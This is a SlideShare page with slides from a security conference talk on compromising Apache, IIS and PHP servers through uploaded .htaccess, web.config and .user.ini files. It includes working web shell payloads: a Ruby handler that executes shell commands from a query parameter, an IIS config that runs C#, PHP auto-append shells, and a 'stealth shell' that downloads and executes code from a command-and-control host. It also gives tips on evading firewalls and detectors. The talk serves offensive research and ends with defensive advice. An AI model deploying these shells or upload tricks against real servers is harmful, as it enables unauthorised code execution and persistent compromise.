SlideShare a Scribd company logo
1 of 72
Attacking Web Servers
via run time configuration
Hello!
I am Eldar Marcussen
Security researcher
Penetration tester
Trainer
@wireghoul
www.justanotherhacker.com
Introduction0
The story…
◇ It started with a pentest
◇ Multiple file uploads, but no shell
◇ A few months later while reading a book…
◇ Htshells!
Htshells
◇ A solution to a past problem
◇ “Super janky web shells”
◇ “Brilliantly nefarious”
◇ https://github.com/wireghoul/htshells/
Run time configuration1
Also known as
◇ Per directory configuration
◇ .htaccess
◇ Web.config
Run time
configuration files
Apache .htaccess IBM HTTP Server .htaccess
IIS Web.config PHP .user.ini
Oracle iPlanet .htaccess Erlang HTTPd .htaccess
Change behaviour
◇ Applications usually designed to a specific
configuration
◇ Changing configuration can alter applications
functionality
Apache internals2
Request processing
Request
Response
Request processing
◇ Request processing cycle
◇ Request parsing phase
◇ Security phase
◇ Preparation phase
◇ Handler phase
https://httpd.apache.org/docs/2.4/developer/request.html
Accept
request
Processing
Axis
Content
Generator
Preliminary processing
Output
Filters
Input
Filters
Request Processing
Logging
Hooks
◇ map_to_storage
◇ header_parser
◇ type_checker
◇ fixups
◇ insert_filter
◇ handler
Context
◇ Server config
◇ Virtual host
◇ Directory
◇ .htaccess
Override
◇ AuthConfig
◇ FileInfo
◇ Indexes
◇ Limit
◇ Options
Lookup
◇ URL: http://host/uploads/image.jpg
◇ Webroot: /var/www/html
◇ Search path:
◇ /.htaccess
◇ /var/.htaccess
◇ /var/www/.htaccess
◇ /var/www/html/.htaccess
◇ /var/www/html/uploads/.htaccess
Abusing run time
configuration3
Existing attacks
Information disclosure
Enable functionality that has
been disabled in order to obtain
more information. Ie: server-
status
Shells
Ability to execute attacker
controlled code on the server.
Authentication bypass
Disable authentication
“Traversal”
Disclose files, not just through
traversal. Enabling directory
indexes, etc
Denial of service
Make the server stop rendering
pages
Other
Everything else,…
Polyglots
htshells files are usually valid
.htaccess files, valid html
pages and valid ${language}
files.
<Files ~ "^.ht">
Order allow,deny
Allow from all
</Files>
<IfModule mod_ruby.c>
RubyRequire apache/erb-run
RubySafeLevel 0
AddType text/html .htaccess
<Files *.htaccess>
SetHandler ruby-object
RubyHandler Apache::ERbRun.instance
</Files>
</IfModule>
# <% require 'cgi';cgi=CGI.new;cmd=cgi["c"];cmd.untaint;puts `#{cmd}` %>
Don’t forget!
◇ There are many options available
◇ Modifying the .htaccess file can increase the chance
of success
Placing files on servers4
Generic methods
◇ File upload
◇ Directory traversal
◇ URL download
◇ XXE
◇ File write from database
File upload
◇ PUT HTTP verb
◇ Upload via form
◇ .htaccess is often an overlooked “extension”
◇ Can the file be renamed after upload?
◇ Combined with directory traversal
◇ File upload functionality have specific behaviours at
the language level (PHP, CGI, etc)
XXE
◇ Leverage the jar:// handler for file upload
◇ Usually specific conditions for each app
http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
Common pitfalls
◇ .htaccess file cannot be overwritten
◇ Syntax errors in .htaccess file = DoS
◇ Apache syntax differs between versions 
◇ Fingerprinting server config is very helpful
◇ Syntax issues and overwriting can be overcome
with some clever tricks and testing locally first
https://github.com/wireghoul/lbmap
Detection and defence5
Anti virus?
Web Application
Firewalls
◇ Blocks silly web shells
◇ Trivial to bypass with tiny bit of code
◇ Not the right defence against files on local drive
Web shell
detectors
◇ Not real time detection, you can rm after use
◇ Only PHP detection
◇ Most of these detect the code, but don’t scan
dotfiles anyway
◇ File hashes is bad detection
The .htaccess
protection method
◇ This one seems popular according to Google
◇ https://tomolivercv.wordpress.com/2011/07/24/prote
ct-your-uploads-folder-with-htaccess/
That one repository on Github with the
Yara rule for:
“Wireghoul”
AllowOverride
None
Myth busting6
Uploads outside
webroot are safe
◇ Not if files in subdirectories are web accessible
◇ Thumbnails generated in sub directory
◇ Thumbnail directory has a web alias
◇ .htaccess lookup paths includes parent directories
Htaccess file
defence
.htaccess files cannot
defend against .htaccess
based attacks!
Story: HumHub
◇ http://seclists.org/fulldisclosure/2015/Feb/60
◇ Unrestricted upload of .htaccess file
◇ User may enable a distributed .htaccess file for
protection
◇ Researcher attempted to bypass, but failed…
Humhub
HumHub comes with a .htaccess.dist [3] file in the
HumHub root directory which, if enabled by the user,
prevents direct access to dotfiles (such as .htaccess,
.svn, .git, etc.) using mod_rewrite.
Since mod_rewrite is unaffected by the override (and
using the RewriteEngine Off directive does not affect
the .htaccess file itself) this prevents the above scenario
from being exploitable.
# prevent httpd from serving dotfiles
(.htaccess, .svn, .git, etc.) - except let's encrypt
challenge
RedirectMatch 403 ^/?.(?!/well-known/acme-
challenge/[w-]{43}$)
Changes since release7
New Apache syntax
◇ Authorization syntax changed
◇ AllowOverrideList allows granular restrictions
◇ IF statements 
Not quite
Turing
complete
Dynamic directives
◇ Use If statements to choose combinations of
directives
◇ Environment variables are available
◇ Query string makes convenient PoC
<If %{QUERY_STRING}="sutats">
SetHandler server-status
Require all granted
</If>
<If %{QUERY_STRING}="ofni">
SetHandler server-info
Require all granted
</If>
<If %{QUERY_STRING}="phpsh23">
Require all granted
SetHandler application/x-httpd-php
# <?php phpinfo(); exit; ?>
</If>
Updating htshells8
Apache
◇ Ensure attacks are syntax compatible
◇ Add the ”Turing” configuration attacks
◇ Other attacks
◇ Push stealth limits
IIS
◇ Initial work by Soroush Dalili (@irsdl)
◇ Additional attacks have been ported to IIS
◇ IIS restricts per directory configuration options
◇ Some attacks depend on server config
◇ … or even registry values
<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.web><compilation>
<buildProviders>
<add extension=".config" type="System.Web.Compilation.PageBuildProvider" />
</buildProviders>
</compilation></system.web><system.webServer>
<handlers><add name="aspx test" path="*.config" verb="*" type="System.Web.UI.PageHandlerFactory"
resourceType="Unspecified" preCondition="integratedMode" /></handlers>
<security>
<requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security></system.webServer></configuration>
<!--
<%@ Page Language="C#"%>
<%
Response.Write("-" + "-" + ">");
Response.Write("<h"+"1>Hello</h1>");
Response.Write("<!" + "-" + "-");
%>
-->
PHP
◇ .user.ini is a PHP per directory configuration
◇ Some directives allow code execution
◇ Requires execution of a PHP file
◇ Use full path to .user.ini file, or breakage can happen
auto_append_file=.user.ini
output_buffering=1
#<?php ob_clean();phpinfo();?>
New stealth shell9
Started as a CTF
idea
◇ Could a .htaccess file be used to “deface” the flag
file regardless of its content?
◇ PHP has a pre script execution stub
◇ Set PHP handlers for relevant non PHP file types
◇ Serve our flag and terminate execution 
A while later….
◇ It’s a bad shell idea 
◇ Pre-execution slows down page loads 
◇ Accidental output can break headers 
Even later….
◇ Post-execution stub?
◇ Keeps connection open 
◇ Accidental output still an issue 
Much later….
◇ Post-execution stub 
◇ Read buffered output, set length and flush 
◇ Accidental output no longer an issue 
◇ Use OOB communications 
#<?php go(); ?>
php_value auto_append_file .htaccess
php_value output_buffering 1
<IfModule lulwat.c>
<Code "<?php
$c=@file_get_contents('http://cnchost/code.txt');
$x=create_function('',$c); $x();
function go() {
ignore_user_abort(true);session_write_close(); $c = ob_get_contents();
ob_clean(); echo substr($c, 0, strlen($c)-1);header("Content-Encoding: none");
header("Content-Length: ".ob_get_length());header("Connection:
close");ob_end_flush();flush(); ob_start();
} ?>
">
</Code>
</IfModule>
#<?php ob_clean();exit();?>
DEMO
New and improved stealth shell, passive code execution
Audience participation
Go to
http://nazdrowie.justanotherhacker.com
Put something funny in the querystring?joke=funny
Put your name/twitter for a chance to win a “price”
ConclusionF
Disable if possible
◇ Use server configuration over per directory files
◇ Don’t forget about frameworks/language files
Dying breed?
◇ Fewer webservers support run time config
◇ Elastic vs shared hosting
◇ Increasing use of containers
Thanks!
Dziękuję!
Any questions?

More Related Content

What's hot

Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddos
fangjiafu
 
Integration with hdfs using WebDFS and NFS
Integration with hdfs using WebDFS and NFSIntegration with hdfs using WebDFS and NFS
Integration with hdfs using WebDFS and NFS
Christophe Marchal
 

What's hot (20)

HAProxy scale out using open source
HAProxy scale out using open sourceHAProxy scale out using open source
HAProxy scale out using open source
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Backup using rsync
Backup using rsyncBackup using rsync
Backup using rsync
 
Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2Re-thinking Performance tuning with HTTP2
Re-thinking Performance tuning with HTTP2
 
Hot potato Privilege Escalation
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web Performance
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Burp suite
Burp suiteBurp suite
Burp suite
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddos
 
Integration with hdfs using WebDFS and NFS
Integration with hdfs using WebDFS and NFSIntegration with hdfs using WebDFS and NFS
Integration with hdfs using WebDFS and NFS
 
WebHDFS at King - May 2014 Hadoop MeetUp
WebHDFS at King - May 2014 Hadoop MeetUpWebHDFS at King - May 2014 Hadoop MeetUp
WebHDFS at King - May 2014 Hadoop MeetUp
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
 
A simple introduction to redis
A simple introduction to redisA simple introduction to redis
A simple introduction to redis
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data Land
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Observability with HAProxy
Observability with HAProxyObservability with HAProxy
Observability with HAProxy
 
Ceph Day Berlin: Ceph and iSCSI in a high availability setup
Ceph Day Berlin: Ceph and iSCSI in a high availability setupCeph Day Berlin: Ceph and iSCSI in a high availability setup
Ceph Day Berlin: Ceph and iSCSI in a high availability setup
 

Similar to CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wireghoul" Marcussen)

Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
Rich Bowen
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
webhostingguy
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Ch 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet ServersCh 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet Servers
webhostingguy
 
Apache2 BootCamp : Getting Started With Apache
Apache2 BootCamp : Getting Started With ApacheApache2 BootCamp : Getting Started With Apache
Apache2 BootCamp : Getting Started With Apache
Wildan Maulana
 
Apache installation and configurations
Apache installation and configurationsApache installation and configurations
Apache installation and configurations
Nikhil Jain
 

Similar to CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wireghoul" Marcussen) (20)

Download It
Download ItDownload It
Download It
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
 
IT Operations for Web Developers
IT Operations for Web DevelopersIT Operations for Web Developers
IT Operations for Web Developers
 
Apache
ApacheApache
Apache
 
Apache Web Server Setup 3
Apache Web Server Setup 3Apache Web Server Setup 3
Apache Web Server Setup 3
 
Securing Apache Web Servers
Securing Apache Web ServersSecuring Apache Web Servers
Securing Apache Web Servers
 
Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 
Install and configure linux
Install and configure linuxInstall and configure linux
Install and configure linux
 
are available here
are available hereare available here
are available here
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko   ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Ch 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet ServersCh 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet Servers
 
Apache
ApacheApache
Apache
 
Apache2 BootCamp : Getting Started With Apache
Apache2 BootCamp : Getting Started With ApacheApache2 BootCamp : Getting Started With Apache
Apache2 BootCamp : Getting Started With Apache
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
WordPress At Scale. WordCamp Dhaka 2019
WordPress At Scale. WordCamp Dhaka 2019WordPress At Scale. WordCamp Dhaka 2019
WordPress At Scale. WordCamp Dhaka 2019
 
Apache ppt
Apache pptApache ppt
Apache ppt
 
Apache installation and configurations
Apache installation and configurationsApache installation and configurations
Apache installation and configurations
 
Nginx pres
Nginx presNginx pres
Nginx pres
 
PHP Profiling/performance
PHP Profiling/performancePHP Profiling/performance
PHP Profiling/performance
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 

Recently uploaded (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 

CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wireghoul" Marcussen)

Editor's Notes

  1. Modules can hook the various processing stages using these hooks, although this is generally not important for run time configuration based attacks.
  2. This is the permission that needs to be set for AllowOverride in order to be able to use these directives..
  3. Give examples for each thing
  4. There is another set of yara rules that are better, but again, they only detect basic PHP shells…
  5. Make sure this is true… redirect attack perhaps? Proxy attacks?